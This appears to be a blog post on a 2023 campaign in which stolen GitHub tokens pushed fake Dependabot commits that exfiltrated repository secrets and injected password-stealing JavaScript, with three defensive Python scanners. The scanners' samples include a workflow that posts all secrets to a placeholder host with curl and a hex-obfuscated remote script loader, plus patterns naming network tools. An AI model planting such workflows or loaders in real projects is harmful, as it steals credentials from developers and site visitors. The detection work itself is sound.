Attackers have been hijacking GitHub accounts and disguising their malicious commits as Dependabot contributions. Their objective is twofold: to steal the authentication secrets stored in the affected repositories, and to harvest passwords from visitors of the web applications whose JavaScript they tamper with.

The campaign took place in July 2023, when researchers noticed unusual commits in numerous public and private repositories. The commits were crafted to look like routine Dependabot commits.

Dependabot is an automated tool provided by GitHub that scans projects for vulnerable or outdated dependencies and automatically opens pull requests to update them.

According to a report by Checkmarx, the fake Dependabot contributions were pushed using stolen GitHub personal access tokens. The attackers' aim was to inject code into the projects that would exfiltrate the projects' secrets.

Impersonating GitHub’s Dependabot

The attack began with the attackers acquiring their targets' GitHub personal access tokens by some means; Checkmarx does not have insight into how this was done.

The threat actors then used automated scripts to push commits with the message “fix” and the author name “dependabot[bot].” Git lets whoever pushes set any author name and e-mail on a commit, so a stolen token is all that is needed to make a commit look like the bot's; what the attacker cannot forge is GitHub's signature on genuine Dependabot commits.
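The identity check that follows from this, written here as an added example rather than code from the Checkmarx report: read `git log` output, pick out commits that claim to be Dependabot, and flag those whose author e-mail is not the address GitHub's bot uses or whose signature does not verify. The log lines below are constructed for the example, and the signature field (`%G?`) only reads `G` when GitHub's web-flow signing key has been imported into the local keyring.

```python
"""Flag commits attributed to Dependabot that GitHub's bot did not actually make.

Input is the output of:
  git log --format='%H%x1f%an%x1f%ae%x1f%G?%x1f%s'
(fields separated by the ASCII unit separator). %G? is 'G' (good signature) only
if GitHub's web-flow signing key is imported locally; 'U' is good but untrusted.
"""
from dataclasses import dataclass

# Identity GitHub's Dependabot uses on its own commits.
DEPENDABOT_NAME = "dependabot[bot]"
DEPENDABOT_EMAIL = "49699333+dependabot[bot]@users.noreply.github.com"

# Constructed sample log, not output from any real repository. Fields: sha,
# author name, author e-mail, signature status, subject.
SAMPLE_LOG = "\n".join([
    "\x1f".join(["a1" * 20, DEPENDABOT_NAME, DEPENDABOT_EMAIL, "G",
                 "Bump lodash from 4.17.20 to 4.17.21"]),
    "\x1f".join(["b2" * 20, DEPENDABOT_NAME, "dev@example.invalid", "N", "fix"]),
    "\x1f".join(["c3" * 20, DEPENDABOT_NAME, DEPENDABOT_EMAIL, "N", "fix"]),
    "\x1f".join(["d4" * 20, "Jane Dev", "jane@example.invalid", "N", "Add login form"]),
])


@dataclass
class Finding:
    sha: str
    subject: str
    reasons: list


def parse_log(text):
    """Split git log lines into (sha, name, email, sig, subject) tuples."""
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\x1f")
        if len(parts) != 5:
            raise ValueError(f"unexpected git log line: {line!r}")
        commits.append(tuple(parts))
    return commits


def audit_dependabot_commits(log_text):
    """Return findings for commits that claim Dependabot's identity but fail checks."""
    findings = []
    for sha, name, email, sig, subject in parse_log(log_text):
        if "dependabot" not in name.lower():
            continue  # only commits claiming the bot identity are of interest
        reasons = []
        if email != DEPENDABOT_EMAIL:
            reasons.append(f"author e-mail {email!r} is not GitHub's Dependabot address")
        if sig not in ("G", "U"):
            reasons.append(f"signature status {sig!r}: GitHub signs real Dependabot commits")
        if reasons:
            findings.append(Finding(sha, subject, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_dependabot_commits(SAMPLE_LOG):
        print(f.sha[:12], repr(f.subject))
        for r in f.reasons:
            print("   -", r)
```

The e-mail check only catches careless spoofing, since an attacker can set the genuine noreply address just as easily; the signature status is the check that a pushed commit cannot satisfy. Run it against a real repository with `git log --format='%H%x1f%an%x1f%ae%x1f%G?%x1f%s' | python3 audit.py` after adapting the `__main__` block to read stdin.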

These fraudulent commits introduced malicious code into the project that performed two actions:

  1. Extracting secrets from the targeted GitHub project and sending them to the attacker’s command and control server.
  2. Modifying existing JavaScript files in the breached repository to inject malware that steals passwords from web-form submissions and sends them to the same command and control address.

The secrets extraction is accomplished by adding a GitHub Actions workflow file, “hook.yml,” that is triggered by every push event on the affected repository. Because the attacker's own commit is a push, the workflow fires as soon as it lands, with access to the repository's secrets.
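A scanner for that workflow shape, added here as an example and not taken from the report or from the malicious file itself: it reads the raw YAML text of a workflow and flags `toJSON(secrets)` (which serialises every secret the job can see), any `run:` step that both reads a secret and calls a network client, and a push trigger. The two sample workflows are constructed for the example, and the URL in the malicious one is a placeholder, not the real command-and-control address.

```python
"""Flag GitHub Actions workflows that push the repository's secrets off-box.

Works on the raw YAML text so no YAML library is required. Heuristics:
  * toJSON(secrets) serialises every secret the workflow can read;
  * a run: script that reads a secret and invokes a network client
    (curl, wget, nc, Invoke-WebRequest, ...) is the classic exfiltration shape;
  * a push trigger means the workflow fires on the commit that introduced it.
"""
import re

SECRET_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)", re.IGNORECASE)
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.", re.IGNORECASE)
NET_CLIENT = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b")
PUSH_TRIGGER = re.compile(
    r"^\s*on:\s*(?:\[[^\]]*\bpush\b[^\]]*\]|push\b)|^\s+push:\s*$", re.MULTILINE)

# Constructed sample modelled on the hook.yml shape described above (placeholder URL).
MALICIOUS = """\
name: hook
on: push
jobs:
  exfil:
    runs-on: ubuntu-latest
    steps:
      - name: fix
        run: |
          curl -s -X POST \\
            -d "${{ toJSON(secrets) }}" \\
            https://c2.example.invalid/collect
"""

# Constructed benign workflow: uses one secret via env, no network client in run:.
BENIGN = """\
name: publish
on:
  push:
    tags: ['v*']
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""


def run_scripts(text):
    """Yield the script body of every `run:` step, joining block scalars (| or >)."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = re.match(r"^(\s*)-?\s*run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest and rest[0] in "|>":
            body = []
            i += 1
            # Continuation lines are indented deeper than the `run:` key.
            while i < len(lines) and (
                not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent
            ):
                body.append(lines[i].strip())
                i += 1
            yield "\n".join(body)
        else:
            yield rest
            i += 1


def scan_workflow(text):
    """Return a list of findings (empty when nothing looks like exfiltration)."""
    findings = []
    if SECRET_DUMP.search(text):
        findings.append("HIGH: toJSON(secrets) dumps every secret the job can read")
    for script in run_scripts(text):
        if (SECRET_REF.search(script) or SECRET_DUMP.search(script)) and NET_CLIENT.search(script):
            first = script.splitlines()[0][:60] if script else ""
            findings.append("HIGH: run step reads secrets and calls a network client: " + first)
    if findings and PUSH_TRIGGER.search(text):
        findings.append("NOTE: workflow fires on push, i.e. on the commit that introduced it")
    return findings


if __name__ == "__main__":
    for label, wf in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, scan_workflow(wf) or "clean")
```

Point it at `.github/workflows/*.yml` in a checkout to triage a repository; a legitimate workflow that needs a secret and a network call (publishing, deployments) will also trip the second rule, so treat the output as a review queue rather than a verdict.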

Example of the malicious commit (Checkmarx)

The password-stealer component appends obfuscated JavaScript to the end of every JavaScript (.js) file in the repository. That appended code loads a further script from a remote site, which watches form submissions and exfiltrates the value of any input of type ‘password.’
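A way to hunt for that injection in a checkout, added here as an example that is not part of the report: decode the `\xNN` string escapes that the obfuscation hides behind, look at the last few lines of each .js file for code that creates a `<script>` element with an off-site `src`, and, because the attacker appended the same snippet to every file, flag trailing lines that are identical across several files. The file contents and the loader string are constructed for the example; the domain in it is a placeholder.

```python
"""Find a remote-script loader appended to the end of .js files.

Two signals, mirroring the injection described above:
  * per file: the trailing code, after undoing \\xNN string escapes, creates a
    <script> element or writes a <script> tag whose src points off-site;
  * across files: the same trailing line appears in several files, which is
    what a scripted "append to every .js" change looks like in a repository.
"""
import re
from collections import defaultdict

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
LOADER = re.compile(
    r"""createElement\(\s*['"]script['"]\s*\)|document\.write\(\s*['"]<script""", re.I)
REMOTE_SRC = re.compile(r"(?:https?:)?//[A-Za-z0-9.-]+")
TAIL_LINES = 3

# Constructed loader in the style described above (placeholder domain). Decodes to:
# (function(){var s=document.createElement("script");s.src="https://cdn.example.invalid/a.js";...
INJECTED = (
    r'''(function(){var s=document.createElement("\x73\x63\x72\x69\x70\x74");'''
    r'''s.src="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x64\x6e\x2e\x65\x78\x61\x6d\x70'''
    r'''\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64\x2f\x61\x2e\x6a\x73";'''
    r'''document.head.appendChild(s)})();'''
)

# Constructed repository snapshot: two files carry the appended loader, one is clean.
FILES = {
    "src/app.js": "import {login} from './auth';\nlogin();\n" + INJECTED + "\n",
    "src/auth.js": "export function login(){\n  return fetch('/api/login');\n}\n" + INJECTED + "\n",
    "src/util.js": "export const add = (a, b) => a + b;\n",
}


def unescape_hex(s):
    """Turn \\xNN escapes into the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def tail(source, n=TAIL_LINES):
    """Last n non-blank lines of a file."""
    lines = [l for l in source.splitlines() if l.strip()]
    return lines[-n:]


def inspect_tail(source):
    """Reasons the tail of one file looks like an injected loader (empty if clean)."""
    raw = "\n".join(tail(source))
    decoded = unescape_hex(raw)
    reasons = []
    n_hex = len(HEX_ESCAPE.findall(raw))
    if n_hex >= 8:
        reasons.append(f"{n_hex} \\xNN escapes in trailing code (string obfuscation)")
    if LOADER.search(decoded):
        reasons.append("trailing code creates a <script> element")
        m = REMOTE_SRC.search(decoded)
        if m:
            reasons.append(f"loads from {m.group(0)}")
    return reasons


def scan_js_files(files):
    """files: {path: source}. Returns {path: [reasons]} for suspicious files only."""
    findings = defaultdict(list)
    last_line_owners = defaultdict(list)
    for path, src in files.items():
        reasons = inspect_tail(src)
        if reasons:
            findings[path].extend(reasons)
        t = tail(src, 1)
        if t and len(t[0]) > 40:  # ignore short, naturally common endings like "})();"
            last_line_owners[t[0]].append(path)
    for owners in last_line_owners.values():
        if len(owners) >= 2:
            for p in owners:
                findings[p].append(f"identical trailing line shared with {len(owners) - 1} other file(s)")
    return dict(findings)


if __name__ == "__main__":
    for path, reasons in scan_js_files(FILES).items():
        print(path)
        for r in reasons:
            print("   -", r)
```

In practice, load `FILES` by walking the checkout for `*.js` (excluding vendored bundles, which legitimately share trailing lines), and compare against the previous clean commit with `git diff --stat` to confirm that only file tails changed.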

Password stealing code invoked by the modified JS files (Checkmarx)

Since many of the compromised tokens also granted access to private repositories, both public and private GitHub repositories were affected by this attack.

Possible compromise points

Checkmarx’s analysts examined logs from some of the victims and determined that the accounts were accessed through stolen PATs (personal access tokens).

These tokens are typically stored in plain text on the developer’s machine (for example by a git credential helper) and authenticate git and API requests directly, so whoever holds a token never has to pass the account’s 2FA (two-factor authentication) check.

“Unfortunately, the token’s access log activity does not appear in the account’s audit log. Therefore, if your token has been compromised, you cannot be certain as the access logs are missing,” warns Checkmarx.

The attack chain (Checkmarx)

Although the company has not reached a definitive conclusion about how the tokens were stolen, it speculates that a malware infection on the developers’ machines is the likeliest route, possibly delivered through a malicious package.

Most of the compromised accounts belonged to users in Indonesia, which suggests the campaign was targeted at that group. The available evidence does not, however, establish a motive.

One suggested mitigation is to switch to GitHub’s fine-grained personal access tokens, which are scoped to selected repositories and to specific permissions and carry a mandatory expiration date, so a stolen token grants far less than a classic token with the broad “repo” scope.

Fabio

Full Stack Developer

About the Author

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.
